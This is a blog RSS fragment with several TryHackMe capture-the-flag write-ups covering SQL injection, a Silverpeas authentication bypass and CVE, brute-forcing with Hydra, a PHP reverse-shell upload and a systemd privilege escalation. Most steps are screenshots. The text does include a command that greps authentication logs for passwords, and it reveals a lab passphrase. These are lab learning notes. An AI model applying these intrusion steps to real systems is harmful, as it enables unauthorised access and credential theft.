&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250702160054.png&quot; alt=&quot;image&quot; /&gt;
1.
&lt;img src=&quot;./Pasted%20image%2020250702160126.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Using &lt;strong&gt;NMAP&lt;/strong&gt;
&lt;img src=&quot;./Pasted%20image%2020250702160259.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Port 22 (SSH) open among the first 1000 scanned ports
&lt;img src=&quot;./Pasted%20image%2020250702160512.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Using &lt;strong&gt;SQL Injection&lt;/strong&gt;
&lt;img src=&quot;./Pasted%20image%2020250702164203.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;When we enter a username, a “password” is returned.
This suggests that the system is likely using a query such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM usuario WHERE username = &apos;smokey&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This makes it possible to use &lt;em&gt;UNION-based&lt;/em&gt; SQL injection, allowing us to query a default database table from &lt;strong&gt;SQLite&lt;/strong&gt; that stores database metadata.&lt;/p&gt;
&lt;p&gt;Now that we have the table name, let’s test it&lt;/p&gt;
&lt;p&gt;How many records does this table contain? (2)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250702170314.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now attempting to read the discovered records&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250702165326.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Since there are two records, we can apply the following approach:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250702170447.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the usernames obtained, we can now retrieve the passwords&lt;/p&gt;
&lt;p&gt;TryHackMeAdmin – Password&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250702171327.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;flag – Password&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250702171419.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Silver Platter</title><link>https://fuwari.vercel.app/posts/silver_platter/silver_platter/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/silver_platter/silver_platter/</guid><description>CTF - &quot;Can you breach the server?&quot;</description><pubDate>Tue, 01 Jul 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/silverplatter&quot;&gt;THM&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;1. NMAP&lt;/h1&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250704144735.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h1&gt;2. GoBuster&lt;/h1&gt;
&lt;p&gt;I then ran &lt;strong&gt;Gobuster&lt;/strong&gt; on port 8080.
&lt;img src=&quot;./Pasted%20image%2020250704145948.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Results&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250704151833.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/website/&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704151213.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;/noredirect.html&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704151258.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1&gt;3. Reasoning with what we have&lt;/h1&gt;
&lt;p&gt;It is understood that we have two web ports open (80/8080).
On port 80, we have the website:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704152849.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704153020.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;“If you want to contact us, please look for our project manager on Silverpeas. His username is scr1ptkiddy.”&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704153043.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What is &lt;strong&gt;Silverpeas&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Silverpeas is an open-source collaboration and content management platform (ECM – Enterprise Content Management), mainly aimed at corporate or institutional environments. The system provides a modular set of features that facilitate communication, document sharing, and internal process management within an organization.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250704154328.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;So this is an organizational software
We found:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704152223.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Technology updated until 2022?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704162020.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Searching for exploits&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250704162358.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/advisories/GHSA-4w54-wwc9-x62c&quot;&gt;LINK&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704165255.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d&quot;&gt;LINK&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250704165800.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1&gt;Exploit Bypass&lt;/h1&gt;
&lt;p&gt;Removing the highlighted part and logging in
&lt;img src=&quot;./Pasted%20image%2020250704170531.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Access granted:
&lt;img src=&quot;./Pasted%20image%2020250704170638.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h1&gt;CVE&lt;/h1&gt;
&lt;p&gt;Now with administrator access, I searched for exploits that could be used with proper privileges.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rhino Security&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/&quot;&gt;https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/&lt;/a&gt;
-&lt;img src=&quot;./Pasted%20image%2020250705144651.png&quot; alt=&quot;image&quot; /&gt;
&lt;a href=&quot;https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47323&quot;&gt;LINK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705144721.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Instructions&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705144936.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Usage&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705145059.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1&gt;Privilege Escalation (tim → tyler)&lt;/h1&gt;
&lt;ol&gt;
&lt;li&gt;Identifying the current user&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705145949.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;Which users exist on the system?&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705153552.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;cat /var/log/auth* | grep -i pass&lt;/code&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;cat /var/log/auth*&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;cat: Command used to display the contents of files.&lt;/li&gt;
&lt;li&gt;/var/log/auth*: Path to authentication log files:
&lt;ul&gt;
&lt;li&gt;The asterisk (*) is a wildcard that includes all files starting with auth in /var/log/ (e.g., auth.log, auth.log.1, auth.log.2.gz, etc.).&lt;/li&gt;
&lt;li&gt;These logs record authentication-related events (logins, sudo, SSH, etc.).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;|&lt;/code&gt; (pipe)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Redirects the output of the previous command (cat) to the next command (grep).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;grep -i pass&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;grep: Tool used to search for patterns in text.&lt;/li&gt;
&lt;li&gt;-i: Case-insensitive mode (ignores uppercase/lowercase).&lt;/li&gt;
&lt;li&gt;pass: Search term (can match “pass”, “Pass”, “PASSWORD”, etc.).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Command output
&lt;img src=&quot;./Pasted%20image%2020250705151118.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let’s test this password:
&lt;code&gt;su tyler&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705151219.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Success!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705151501.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1&gt;Privilege Escalation (tyler → root)&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Understanding the user
&lt;img src=&quot;./Pasted%20image%2020250705152232.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The user has sudo privileges&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;sudo su&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250705154234.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Now searching for the flags
&lt;em&gt;(I always recommend checking the user’s home directory)&lt;/em&gt;
* &lt;img src=&quot;./Pasted%20image%2020250705154339.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Vulnversity</title><link>https://fuwari.vercel.app/posts/vulnversity/vulnversity/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/vulnversity/vulnversity/</guid><description>CTF - &quot;Learn about active recon, web app attacks and privilege escalation.&quot;</description><pubDate>Tue, 04 Feb 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/vulnversity&quot;&gt;THM&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;1. Scanning for open ports with NMAP&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250204114657.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;2. Enumerating directories on port 3333 with GoBuster&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250204121129.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;3. Using BurpSuite&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;The first step was to access the page that accepts file uploads.
&lt;img src=&quot;Pasted%20image%2020250218222643.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Now that I know where the page accepts files, I performed a test using Burp.&lt;br /&gt;
First, I captured an example request in the Proxy tab (just try to upload a file and capture the request):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250218223104.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Then I used the Sniper attack, modifying only a specific part of this request:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250218223215.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;By adding the symbols, the loaded payloads will be injected at that position.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250218223330.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Now we analyze the response:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;Pasted%20image%2020250219003139.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;From this, we know which file types are accepted by the input.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;4. Now that I know which file types the input accepts, I used a .phtml file to gain access to the machine&lt;/h2&gt;
&lt;p&gt;(File from: &lt;a href=&quot;https://github.com/pentestmonkey/php-reverse-shell&quot;&gt;Github&lt;/a&gt;) and upload it to the server to obtain a reverse shell. Some changes are required in the file:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Since we are on the TryHackMe VPN, we set the corresponding IP address.&lt;br /&gt;
&lt;img src=&quot;Pasted%20image%2020250219013240.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;li&gt;With the file uploaded to the server, I found the directory where uploaded files are stored and accessed the malicious file.&lt;br /&gt;
After that, we establish the connection as shown below:
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219014146.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;5. To retrieve the flag, I entered /home/bill and found a file containing a code.&lt;/h2&gt;
&lt;h2&gt;6. Privilege escalation in this case&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Searching inside the root directory:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219081656.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We will use a bash reverse shell:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;We create a file to escalate privileges (root.service).&lt;br /&gt;
&lt;img src=&quot;Pasted%20image%2020250219172536.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Then we use wget from inside the target machine, pointing to a simple HTTP server.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Server:
&lt;img src=&quot;Pasted%20image%2020250219173313.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;li&gt;Downloading the malicious file (root.service).&lt;br /&gt;
We must be in a directory where we have write permission (/tmp).
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219180320.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Using wget to download the malicious file from the server:
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219180441.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Enabling this file with systemctl:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219180722.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Starting the service:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219181118.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;7. Connecting with the reverse shell file&lt;/h2&gt;
&lt;p&gt;(You must be listening for the connection while starting root.service)&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219180911.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219181401.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;8. Finally, we capture the last flag&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;Pasted%20image%2020250219181616.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
</content:encoded></item><item><title>Basic Pentesting</title><link>https://fuwari.vercel.app/posts/basicpentesting/basicpentesting/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/basicpentesting/basicpentesting/</guid><description>CTF - &quot;This is a machine that allows you to practise web app hacking and privilege escalation.&quot;</description><pubDate>Wed, 29 Jan 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/basicpentestingjt&quot;&gt;THM&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a href=&quot;https://tryhackme.com/room/basicpentestingjt&quot;&gt;Basic Pentesting&lt;/a&gt;&lt;/h1&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Para achar os recursos expostos da maquina:&lt;strong&gt;NMAP&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250131105449.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Achar os diretórios: &lt;strong&gt;GoBuster&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250131111528.png&quot; alt=&quot;image&quot; /&gt;
Encontramos isso: &lt;img src=&quot;./Pasted%20image%2020250131114650.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Utilizando: &lt;strong&gt;enum4linux&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;./photo_2026-01-27_17-47-06.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Utilizando o hydra para fazer o forcebrute: &lt;strong&gt;Hydra&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250131120959.png&quot; alt=&quot;image&quot; /&gt;
Resultado:&lt;img src=&quot;./Pasted%20image%2020250131125500.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Usando &lt;strong&gt;SSH&lt;/strong&gt; vamos logar na maquina:
&lt;img src=&quot;./Pasted%20image%2020250131130222.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Para copiar o arquivo do &lt;strong&gt;PEASS-ng&lt;/strong&gt;:&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;scp &amp;lt;caminho do arquivo que você deseja enviar&amp;gt;(Downloads/...) &amp;lt;login para ssh&amp;gt;(jan@TARGET_IP)
&lt;img src=&quot;./Pasted%20image%2020250201113233.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Executando
1. &lt;img src=&quot;./Pasted%20image%2020250201113406.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Conseguimos a senha rsa do usuário kay, utilizando para fazer login usando &lt;strong&gt;JohnTheRipper&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Criei um arquivo com a senha:
&lt;img src=&quot;./Pasted%20image%2020250201114558.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Porém o arquivo possui uma senha:
&lt;img src=&quot;./Pasted%20image%2020250201115430.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Então vamos usar o &lt;strong&gt;JohnTheRipper&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Aqui utilizamos os ssh2john.py&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250201115943.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020250201120349.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020250201122637.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Agora fazemos o login o usuário kay
1. a passphrase = beeswax
&lt;img src=&quot;./Pasted%20image%2020250201161416.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
</content:encoded></item></channel></rss>